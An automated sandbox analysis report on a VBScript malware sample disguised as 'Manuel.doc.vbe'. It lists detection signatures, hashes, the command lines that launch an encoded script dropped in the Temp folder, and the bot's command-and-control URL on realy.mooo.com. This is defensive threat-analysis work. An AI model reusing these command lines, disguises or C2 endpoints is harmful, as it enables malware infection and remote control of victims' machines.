Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report Manuel.doc.vbe

Overview

General Information

Sample Name:Manuel.doc.vbe
Analysis ID:369332
MD5:cc2db35f43b4a12700c431811a463439
SHA1:d838aaf8d656b7d8d0f48d13646e677eaad35f20
SHA256:fe9c78249937d57aaed2792238caeea298e715d9cf261add1fbfbaeeab084d40
Infos:

Most interesting Screenshot:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Creates an autostart registry key pointing to binary in C:\Windows
Sample contains encoded VBS code
Suspicious javascript / visual basic script found (invalid extension)
Uses an obfuscated file name to hide its real file extension (double extension)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
May sleep (evasive loops) to hinder dynamic analysis

Classification

Startup

  • System is w7x64
  • wscript.exe (PID: 2372 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Manuel.doc.vbe' MD5: 045451FA238A75305CC26AC982472367)
    • cmd.exe (PID: 2560 cmdline: 'C:\Windows\System32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • wscript.exe (PID: 2300 cmdline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 045451FA238A75305CC26AC982472367)
  • cmd.exe (PID: 2824 cmdline: 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • wscript.exe (PID: 2704 cmdline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 045451FA238A75305CC26AC982472367)
  • cmd.exe (PID: 2480 cmdline: 'C:\WINDOWS\system32\cmd.exe' /c start wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • wscript.exe (PID: 1616 cmdline: wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db MD5: 045451FA238A75305CC26AC982472367)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Antivirus / Scanner detection for submitted sampleShow sources
Source: Manuel.doc.vbeAvira: detected
Multi AV Scanner detection for submitted fileShow sources
Source: Manuel.doc.vbeVirustotal: Detection: 75%Perma Link
Source: Manuel.doc.vbeMetadefender: Detection: 55%Perma Link
Source: Manuel.doc.vbeReversingLabs: Detection: 74%
Source: Binary string: wshom.pdb source: wscript.exe, 00000004.00000002.3148533955.0000000001F70000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148046580.0000000000370000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148147651.0000000000470000.00000002.00000001.sdmp
Source: unknownDNS traffic detected: queries for: realy.mooo.com
Source: wscript.exe, 00000000.00000003.2068250667.00000000003EC000.00000004.00000001.sdmpString found in binary or memory: http://realy.mooo.com
Source: wscript.exe, 00000000.00000003.2068250667.00000000003EC000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.3148136888.000000000041E000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148055856.00000000002AE000.00000004.00000020.sdmpString found in binary or memory: http://realy.mooo.com/
Source: wscript.exe, 00000007.00000002.3148075473.000000000043E000.00000004.00000020.sdmpString found in binary or memory: http://realy.mooo.com/(
Source: wscript.exe, 0000000A.00000002.3148055856.00000000002AE000.00000004.00000020.sdmpString found in binary or memory: http://realy.mooo.com/bo
Source: wscript.exe, 00000004.00000002.3148976708.000000000490E000.00000004.00000001.sdmp, wscript.exe, 00000004.00000002.3148136888.000000000041E000.00000004.00000020.sdmp, wscript.exe, 00000007.00000002.3148926880.000000000393A000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.3148114769.00000000004C7000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148963520.0000000003EB6000.00000004.00000001.sdmpString found in binary or memory: http://realy.mooo.com/bot/lancer/index.php?cmd=ping
Source: wscript.exe, 00000007.00000002.3148114769.00000000004C7000.00000004.00000020.sdmp, wscript.exe, 0000000A.00000002.3148939482.0000000003E90000.00000004.00000001.sdmpString found in binary or memory: http://realy.mooo.com/bot/lancer/index.php?cmd=pingAdva
Source: wscript.exe, 00000004.00000002.3148203777.00000000004A6000.00000004.00000020.sdmpString found in binary or memory: http://realy.mooo.com/bot/lancer/index.php?cmd=pingAdvaX%L
Source: wscript.exe, 00000000.00000002.2070144321.0000000005120000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3149096479.00000000051E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3149114904.0000000005280000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3149109885.0000000005410000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: wscript.exe, 00000000.00000002.2068750916.0000000001CE0000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3148277604.0000000001C00000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3148226103.0000000001C50000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3148231089.0000000001C60000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: wscript.exe, 00000000.00000002.2070144321.0000000005120000.00000002.00000001.sdmp, wscript.exe, 00000004.00000002.3149096479.00000000051E0000.00000002.00000001.sdmp, wscript.exe, 00000007.00000002.3149114904.0000000005280000.00000002.00000001.sdmp, wscript.exe, 0000000A.00000002.3149109885.0000000005410000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA

System Summary:

barindex
Sample contains encoded VBS codeShow sources
Source: Manuel.doc.vbe.vbe_unpackBinary string: End Function
Source: Manuel.doc.vbe.vbe_unpackBinary string: End Function
Suspicious javascript / visual basic script found (invalid extension)Show sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: unknownProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.db
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe wscript /e:VBScript.Encode C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: classification engineClassification label: mal80.evad.winVBE@11/1@63/1
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\SysinfY2X.dbJump to behavior
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%SysinfYhX.db%'
